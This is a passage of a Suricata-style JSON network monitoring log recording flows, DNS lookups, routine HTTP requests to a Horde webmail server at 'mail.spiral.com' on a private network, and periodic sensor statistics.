Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":29,"tx_id":0}} {"timestamp":"2020-02-29T00:22:43.003183+0000","flow_id":2063545735567906,"event_type":"flow","src_ip":"192.168.10.130","src_port":34902,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":14,"pkts_toclient":15,"bytes_toserver":1970,"bytes_toclient":12607,"start":"2020-02-29T00:21:31.907810+0000","end":"2020-02-29T00:21:42.154980+0000","age":11,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:46.541552+0000","flow_id":1826094178214393,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52968,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/ajax.php\/kronolith\/listTopTags","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/json","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":122},"app_proto":"http","fileinfo":{"filename":"\/services\/ajax.php\/kronolith\/listTopTags","state":"CLOSED","stored":false,"size":127,"tx_id":0}} {"timestamp":"2020-02-29T00:22:48.000175+0000","event_type":"stats","stats":{"uptime":15020,"capture":{"kernel_packets":139767,"kernel_drops":0},"decoder":{"pkts":139773,"bytes":95948805,"invalid":194,"ipv4":138208,"ipv6":10,"ethernet":139773,"raw":0,"null":0,"sll":0,"tcp":132667,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2838,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":1,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:50.000294+0000","flow_id":436341541717765,"event_type":"flow","src_ip":"192.168.10.130","src_port":34228,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":66,"pkts_toclient":85,"bytes_toserver":8194,"bytes_toclient":105657,"start":"2020-02-29T00:21:44.345861+0000","end":"2020-02-29T00:21:49.809612+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:55.000161+0000","event_type":"stats","stats":{"uptime":15027,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099072},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2839,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":5,"flows_removed":0,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18841,"memcap_state":0,"memcap_global":0},"http":{"memuse":18682,"memcap":0}}} {"timestamp":"2020-02-29T00:22:58.001576+0000","flow_id":2139845830940751,"event_type":"flow","src_ip":"192.168.10.81","src_port":52950,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":10,"bytes_toserver":2278,"bytes_toclient":6262,"start":"2020-02-29T00:21:52.170063+0000","end":"2020-02-29T00:21:57.196929+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:58.001929+0000","flow_id":1200270195341367,"event_type":"flow","src_ip":"192.168.10.81","src_port":52952,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":9,"pkts_toclient":8,"bytes_toserver":1676,"bytes_toclient":4695,"start":"2020-02-29T00:21:52.178231+0000","end":"2020-02-29T00:21:57.194742+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:22:59.000384+0000","flow_id":2155793044521586,"event_type":"flow","src_ip":"192.168.10.81","src_port":52954,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":3,"bytes_toserver":272,"bytes_toclient":206,"start":"2020-02-29T00:21:52.180850+0000","end":"2020-02-29T00:21:58.127221+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:00.000403+0000","flow_id":744964991983055,"event_type":"flow","src_ip":"192.168.10.122","src_port":46162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:17:59.499151+0000","end":"2020-02-29T00:17:59.609546+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:02.003132+0000","event_type":"stats","stats":{"uptime":15034,"capture":{"kernel_packets":139773,"kernel_drops":0},"decoder":{"pkts":139776,"bytes":95949003,"invalid":194,"ipv4":138211,"ipv6":10,"ethernet":139776,"raw":0,"null":0,"sll":0,"tcp":132670,"udp":5332,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097920},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2873,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2889,"synack":2880,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":147,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":776,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":106,"dcerpc_udp":0,"dns_udp":2439,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2521}},"flow_mgr":{"closed_pruned":2842,"new_pruned":17,"est_pruned":2497,"bypassed_pruned":0,"flows_checked":7,"flows_notimeout":1,"flows_timeout":6,"flows_timeout_inuse":5,"flows_removed":1,"rows_checked":65536,"rows_skipped":65527,"rows_empty":2,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":18511,"memcap_state":0,"memcap_global":0},"http":{"memuse":18522,"memcap":0}}} {"timestamp":"2020-02-29T00:23:02.069259+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":37424,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":45637,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:02.178042+0000","flow_id":233339917569675,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":37424,"proto":"UDP","dns":{"type":"answer","id":45637,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:03.000165+0000","flow_id":2218856049239313,"event_type":"flow","src_ip":"192.168.10.81","src_port":52948,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":22,"pkts_toclient":28,"bytes_toserver":4261,"bytes_toclient":25370,"start":"2020-02-29T00:21:51.877841+0000","end":"2020-02-29T00:22:01.788265+0000","age":10,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006537+0000","flow_id":1839442932834932,"event_type":"flow","src_ip":"192.168.10.130","src_port":34234,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":26,"pkts_toclient":31,"bytes_toserver":3724,"bytes_toclient":32279,"start":"2020-02-29T00:21:44.434804+0000","end":"2020-02-29T00:21:49.758600+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006701+0000","flow_id":867577733854192,"event_type":"flow","src_ip":"192.168.10.130","src_port":34256,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":117,"bytes_toserver":14695,"bytes_toclient":147060,"start":"2020-02-29T00:21:56.734192+0000","end":"2020-02-29T00:22:01.972112+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006862+0000","flow_id":2142770703138942,"event_type":"flow","src_ip":"192.168.10.130","src_port":34232,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":98,"pkts_toclient":146,"bytes_toserver":13683,"bytes_toclient":191039,"start":"2020-02-29T00:21:44.426110+0000","end":"2020-02-29T00:21:49.809005+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.006962+0000","flow_id":2145609676489439,"event_type":"flow","src_ip":"192.168.10.130","src_port":34226,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":80,"pkts_toclient":124,"bytes_toserver":9977,"bytes_toclient":163566,"start":"2020-02-29T00:21:44.197343+0000","end":"2020-02-29T00:21:50.074452+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007088+0000","flow_id":1040213943538856,"event_type":"flow","src_ip":"192.168.10.130","src_port":34230,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":23,"pkts_toclient":27,"bytes_toserver":4419,"bytes_toclient":23565,"start":"2020-02-29T00:21:44.349352+0000","end":"2020-02-29T00:21:49.759472+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007163+0000","flow_id":948151319534199,"event_type":"flow","src_ip":"192.168.10.130","src_port":34240,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":39,"pkts_toclient":63,"bytes_toserver":5995,"bytes_toclient":76626,"start":"2020-02-29T00:21:44.727671+0000","end":"2020-02-29T00:21:49.811419+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007244+0000","flow_id":823107642465495,"event_type":"flow","src_ip":"192.168.10.130","src_port":34260,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":4488,"start":"2020-02-29T00:21:56.924887+0000","end":"2020-02-29T00:22:01.968024+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:03.007349+0000","flow_id":832002519790009,"event_type":"flow","src_ip":"192.168.10.130","src_port":34258,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":31,"pkts_toclient":40,"bytes_toserver":10242,"bytes_toclient":41891,"start":"2020-02-29T00:21:56.913849+0000","end":"2020-02-29T00:22:01.971946+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:04.004628+0000","flow_id":1572605190170049,"event_type":"flow","src_ip":"192.168.10.122","src_port":59238,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:03.353729+0000","end":"2020-02-29T00:18:03.458627+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:07.000630+0000","flow_id":2079140748366751,"event_type":"flow","src_ip":"192.168.10.122","src_port":33356,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:06.824223+0000","end":"2020-02-29T00:18:06.932681+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:08.000776+0000","flow_id":362352125925699,"event_type":"flow","src_ip":"192.168.10.122","src_port":34535,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:07.317763+0000","end":"2020-02-29T00:18:07.426181+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:10.000240+0000","event_type":"stats","stats":{"uptime":15042,"capture":{"kernel_packets":139790,"kernel_drops":0},"decoder":{"pkts":139884,"bytes":96036227,"invalid":195,"ipv4":138317,"ipv6":10,"ethernet":139884,"raw":0,"null":0,"sll":0,"tcp":132773,"udp":5334,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10001,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7095328},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2875,"ssn_memcap_drop":0,"pseudo":350,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2891,"synack":2882,"rst":1212,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":25},"app_layer":{"flow":{"http":1892,"ftp":0,"smtp":0,"tls":777,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2440,"failed_udp":116},"tx":{"http":4873,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2522}},"flow_mgr":{"closed_pruned":2851,"new_pruned":17,"est_pruned":2501,"bypassed_pruned":0,"flows_checked":2,"flows_notimeout":1,"flows_timeout":1,"flows_timeout_inuse":0,"flows_removed":1,"rows_checked":65536,"rows_skipped":65533,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":17849,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} {"timestamp":"2020-02-29T00:23:10.326117+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":48534,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":27443,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:10.434568+0000","flow_id":1902793706109413,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":48534,"proto":"UDP","dns":{"type":"answer","id":27443,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:10.599487+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093}} {"timestamp":"2020-02-29T00:23:11.007440+0000","flow_id":1461949668569849,"event_type":"flow","src_ip":"192.168.10.130","src_port":34266,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":7,"bytes_toserver":1238,"bytes_toclient":653,"start":"2020-02-29T00:22:04.111353+0000","end":"2020-02-29T00:22:09.117658+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:11.007734+0000","flow_id":1370887756629374,"event_type":"flow","src_ip":"192.168.10.122","src_port":50796,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-29T00:18:10.771454+0000","end":"2020-02-29T00:18:10.880127+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:11.007855+0000","flow_id":545279093472280,"event_type":"flow","src_ip":"192.168.10.130","src_port":34262,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":69,"pkts_toclient":140,"bytes_toserver":10673,"bytes_toclient":185900,"start":"2020-02-29T00:22:03.949272+0000","end":"2020-02-29T00:22:09.400447+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:23:12.000169+0000","flow_id":1665067602402,"event_type":"flow","src_ip":"192.168.10.122","src_port":37306,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.152034+0000","end":"2020-02-29T00:18:11.260439+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:12.000581+0000","flow_id":807637155517539,"event_type":"flow","src_ip":"192.168.10.122","src_port":41542,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:18:11.398435+0000","end":"2020-02-29T00:18:11.506897+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:23:13.290183+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8093},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:23:13.300862+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":41517,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43331,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:23:13.412077+0000","flow_id":35079932974910,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":41517,"proto":"UDP","dns":{"type":"answer","id":43331,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:23:13.520499+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528}} {"timestamp":"2020-02-29T00:23:13.538122+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/dynamic.php?page=mailbox","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8528},"app_proto":"http","fileinfo":{"filename":"\/imp\/dynamic.php","state":"CLOSED","stored":false,"size":36695,"tx_id":1}} {"timestamp":"2020-02-29T00:23:13.547702+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138}} {"timestamp":"2020-02-29T00:23:13.550207+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52972,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/mime.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":138},"app_proto":"http","fileinfo":{"filename":"\/imp\/themes\/default\/mime.css","state":"CLOSED","stored":false,"size":211,"tx_id":2}} {"timestamp":"2020-02-29T00:23:13.550601+0000","flow_id":1632747637355106,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52972,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/imp\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/imp\/dynamic.php?page=mailbox","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4980}} 